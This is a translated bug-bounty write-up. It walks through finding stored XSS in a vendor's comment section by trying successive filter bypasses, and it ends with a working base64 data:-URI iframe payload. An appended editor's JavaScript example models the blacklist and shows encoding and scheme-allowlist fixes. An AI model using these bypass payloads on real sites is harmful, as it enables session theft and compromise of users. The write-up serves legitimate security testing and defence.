How I found a stored XSS, and a few bypass ideas


风后奇门


The minimum payout on a certain SRC turned out to be 2000, and with 750 already banked I wasn't willing to let it go, so I had to go get that 2000.
After that I dug into the site like crazy and stumbled on a spot I hadn't found before, and a stored XSS at that!
When I first came back to this site, which I'd tested before without finding anything, it looked like there was nothing left, so I went to the comment section and tested it one more time.
A quick test first
Mood: whatever
<img src=0>
The result is empty, nothing at all
If the plain version does nothing it's definitely filtered, so I figured capturing the request and testing from there would be quicker.
After capturing the request I found it was encoded
Encoded:
%3Cimg+src%3D%22javascript%3Aalert('XSS')%22%3E
Before encoding:
<img src="javascript:alert('XSS')">
With a "javascript" in there it's bound to be intercepted, it's a big vendor after all
So I typed it by hand, dropping the javascript
and using + for the space
0>
Still empty, but I found the img does exist in the page source, just escaped, so there is still some hope ^_^
Mood: a bit frustrated
Let's try to bypass the escaping
%00 in place of the space
0%00>
Keep bypassing
#src=0>
Again!
<img\/src=0>
A turning point! You can see the / has been converted into a space
Mood: excited
Go straight for it
<img/src=0/onerror=alert(/xss/)>
Too bad, intercepted. It seems the keyword alert gets intercepted as soon as it touches (), and onerror as soon as it touches =
Trying to bypass: spaces and %00 get escaped, so try / as the space, and replace alert with top['alert']
But! It doesn't work
Mood: disappointed
Tried /**/, %00, case changes, eval and the other usual tricks, all of them killed. Is that it?!
I don't necessarily have to use  anyway, let's try
Mood: !!! a way out after all
Next, go straight at it; the script tag definitely can't be used anymore
Let's try
<iframe/src=vbscript:msgbox(123)></iframe>
It gets written in but doesn't seem to execute, keep bypassing
Mood: persist, persevere, rack my brains
I tried all sorts of bypass methods, then it suddenly hit me: if the open approach doesn't work, go the covert route
If plaintext doesn't work, try it base64-encoded and see whether that gets intercepted
<script>alert(/xss/)</script>
Encode it
Go straight for it
Payload: <iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=></iframe>

Perfect, done!! With this trick I dug up a full 3 stored XSS on this site, very happy
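Editor's added example, not code from 风后奇门's post or from the target site. It models the kind of keyword blacklist the post describes (the rules below are assumptions reconstructed from what the author reports being blocked, not the site's real ruleset), shows why the final iframe payload with a base64 data: URI walks straight past such a filter while the decoded content the browser runs would have matched every rule, and contrasts that with the defence that does not depend on enumerating tricks: encoding for the HTML context plus an allowlist of URL schemes. Function names (naiveBlacklistFilter, decodeDataUri, escapeHtml, isSafeUrlScheme, trace) are the editor's.

```javascript
// Added example (editor's own code, not from the original post).
// Models a request-body keyword blacklist of the kind the post ran into,
// then shows the view the browser gets after decoding the data: URI.
// Every rule here is an ASSUMPTION reconstructed from the post's observations.

// Assumed blacklist: each rule corresponds to one thing the post saw blocked.
const BLOCKED_PATTERNS = [
  /javascript/i,   // "javascript:" in src was intercepted
  /alert\s*\(/i,   // alert was blocked once it touched "("
  /onerror\s*=/i,  // onerror was blocked once it touched "="
  /<script/i,      // the script tag "definitely can't be used"
  /eval/i,         // listed among the usual tricks that got killed
];

// The payload the post ends with. The base64 decodes to
// <script>alert(/xss/)</script>, which the blacklist would reject verbatim.
const PAYLOAD =
  "<iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=></iframe>";

// A blacklist filter only ever sees the bytes in the request body.
function naiveBlacklistFilter(input) {
  const hit = BLOCKED_PATTERNS.find((re) => re.test(input));
  return hit ? { blocked: true, rule: String(hit) } : { blocked: false, output: input };
}

// What the browser actually loads into the iframe: the decoded data: URI body.
// Returns null for anything that is not a data: URI.
function decodeDataUri(uri) {
  const m = /^data:([^,]*?)(;base64)?,(.*)$/is.exec(uri);
  if (!m) return null;
  return m[2]
    ? Buffer.from(m[3], "base64").toString("utf8")
    : decodeURIComponent(m[3]);
}

// Fix 1: encode comment text for the HTML context, so user input can never
// open a tag at all. No keyword list to keep up with.
function escapeHtml(s) {
  return s.replace(/[&<>"'\/]/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  })[c]);
}

// Fix 2: if user-supplied URLs must be allowed in src/href, allowlist the
// scheme instead of blacklisting "javascript". Relative URLs have no scheme
// and pass; data:, vbscript: and javascript: all fail the allowlist.
function isSafeUrlScheme(url) {
  const m = /^\s*([a-z][a-z0-9+.\-]*):/i.exec(url);
  if (!m) return true; // relative URL
  return ["http", "https", "mailto"].includes(m[1].toLowerCase());
}

// Walk a payload through the filter's view and the browser's view.
function trace(payload) {
  const filterView = naiveBlacklistFilter(payload);
  const srcMatch = /src=([^\s>]+)/i.exec(payload);
  const browserView = srcMatch ? decodeDataUri(srcMatch[1]) : null;
  return {
    filterView,
    browserView,
    browserViewWouldHaveBeenBlocked: browserView
      ? naiveBlacklistFilter(browserView).blocked
      : false,
    safeRendering: escapeHtml(payload),
    srcAllowed: srcMatch ? isSafeUrlScheme(srcMatch[1]) : null,
  };
}

console.log(JSON.stringify(trace(PAYLOAD), null, 2));
```

Run with node; the trace shows the same payload accepted by the filter and rejected once decoded, which is the whole gap the post exploited: the filter inspects the transport form, the browser executes the decoded form. Output encoding and a scheme allowlist close that gap without caring which encoding or separator the next tester tries.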
